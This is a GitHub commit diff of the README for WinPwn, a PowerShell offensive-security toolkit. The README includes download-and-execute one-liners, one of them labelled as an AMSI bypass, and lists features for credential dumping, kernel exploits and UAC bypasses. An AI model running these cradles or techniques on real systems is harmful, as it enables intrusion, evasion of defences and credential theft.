Skip to content

Commit 7cf4a5f

Browse files
Update README.md
1 parent f7ab940 commit 7cf4a5f

File tree

1 file changed

+29
-11
lines changed

1 file changed

+29
-11
lines changed

README.md

Lines changed: 29 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -8,55 +8,71 @@ Any suggestions, feedback, Pull requests and comments are welcome!
88

99
Just Import the Modules with:
1010
`Import-Module .\WinPwn.ps1` or
11-
`iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')`
11+
`iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')`
1212

1313
For AMSI Bypass use the following oneliner:
14-
`iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')`
14+
`iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')`
1515

1616

1717
If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included.
1818

1919
Functions available after Import:
2020
* #### `WinPwn` -> Menu to choose attacks:
21-
![alt text](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/WinPwn.jpg)
21+
![alt text](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/WinPwn.JPG)
2222
* #### `Inveigh` -> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated
2323
* #### `sessionGopher` -> Executes Sessiongopher Asking you for parameters
2424
* #### `kittielocal` ->
2525
* Obfuscated Invoke-Mimikatz version
2626
* Safetykatz in memory
2727
* Dump lsass using rundll32 technique
28-
* Download and run Lazagne
28+
* Download and run obfuscated Lazagne
2929
* Dump Browser credentials
30-
* Extract juicy informations from memory
30+
* Customized Mimikittenz Version
3131
* Exfiltrate Wifi-Credentials
3232
* Dump SAM-File NTLM Hashes
3333
* #### `localreconmodules` ->
3434
* Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more
3535
* Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP
3636
* Checks the Powershell event logs for credentials or other sensitive informations
37+
* Collect Browser Credentials and history
3738
* Search for passwords in the registry and on the file system
3839
* Find sensitive files (config files, RDP files, keepass Databases)
3940
* Search for .NET Binaries on the local system
4041
* Optional: Get-Computerdetails (Powersploit) and PSRecon
4142
* #### `domainreconmodules` ->
42-
* Collect various domain informations for manual review
43+
* Collect various domain informations for manual review
4344
* Find AD-Passwords in description fields
4445
* Search for potential sensitive domain share files
4546
* ACLAnalysis
4647
* Unconstrained delegation systems/users are enumerated
4748
* MS17-10 Scanner for domain systems
4849
* Bluekeep Scanner for domain systems
4950
* SQL Server discovery and Auditing functions (default credentials, passwords in the database and more)
50-
* MS-RPRN Check for Domaincontrollers
51+
* MS-RPRN Check for Domaincontrollers or all systems
5152
* Group Policy Audit with Grouper2
5253
* An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon.
53-
* #### `Privescmodules` -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords)
54-
* #### `latmov` -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems
54+
* #### `Privescmodules` -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords, dll Hijacking, File Permissions, IKEExt Check, Rotten/Juicy Potato Check)
55+
* #### `kernelexploits` ->
56+
* MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!
57+
* MS16-032 - (2008/7/8/10/2012)!
58+
* MS16-135 - (WS2k16 only)!
59+
* CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
60+
* CVE-2019-0841 - April 2019!
61+
* CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019!
62+
* CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019!
63+
* CVE-2019-1215 - September 2019 - x64 only!
64+
* CVE-2020-0638 - February 2020 - x64 only!
65+
* Juicy-Potato Exploit
66+
* #### `UACBypass` ->
67+
* UAC Magic, Based on James Forshaw's three part post on UAC
68+
* UAC Bypass cmstp technique, by Oddvar Moe
69+
* DiskCleanup UAC Bypass, by James Forshaw
70+
* DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte
5571
* #### `shareenumeration` -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)
5672
* #### `groupsearch` -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)
5773
* #### `Kerberoasting` -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
5874
* #### `powerSQL` -> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks
59-
* #### `Sharphound` -> Downloads Sharphound and collects Information for the Bloodhound DB
75+
* #### `Sharphound` -> Bloodhound 3.0 Report
6076
* #### `adidnswildcard` -> Create a Active Directory-Integrated DNS Wildcard Record
6177
* #### `MS17-10` -> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability
6278
* #### `Sharpcradle` -> Load C# Files from a remote Webserver to RAM
@@ -85,7 +101,7 @@ Functions available after Import:
85101
- [X] [411Hall](https://github.com/411Hall/) - JAWS
86102
- [X] [sense-of-security](https://github.com/sense-of-security/) - ADrecon
87103
- [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray
88-
- [X] [rasta-mouse](https://github.com/rasta-mouse/) - Sherlock
104+
- [X] [rasta-mouse](https://github.com/rasta-mouse/) - Sherlock, AMsi Bypass
89105
- [X] [AlessandroZ](https://github.com/AlessandroZ/) - LaZagne
90106
- [X] [samratashok](https://github.com/samratashok/) - nishang
91107
- [X] [leechristensen](https://github.com/leechristensen/) - Random Repo
@@ -96,6 +112,8 @@ Functions available after Import:
96112
- [X] [l0ss](https://github.com/l0ss/) - Grouper2
97113
- [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray
98114
- [X] [enjoiz](https://github.com/enjoiz/Privesc) - PrivEsc
115+
- [X] [James Forshaw](https://github.com/tyranid) - UACBypasses
116+
- [X] [Oddvar Moe](https://github.com/api0cradle) - UACBypass
99117

100118
## Legal disclaimer:
101119
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

0 commit comments

Comments
 (0)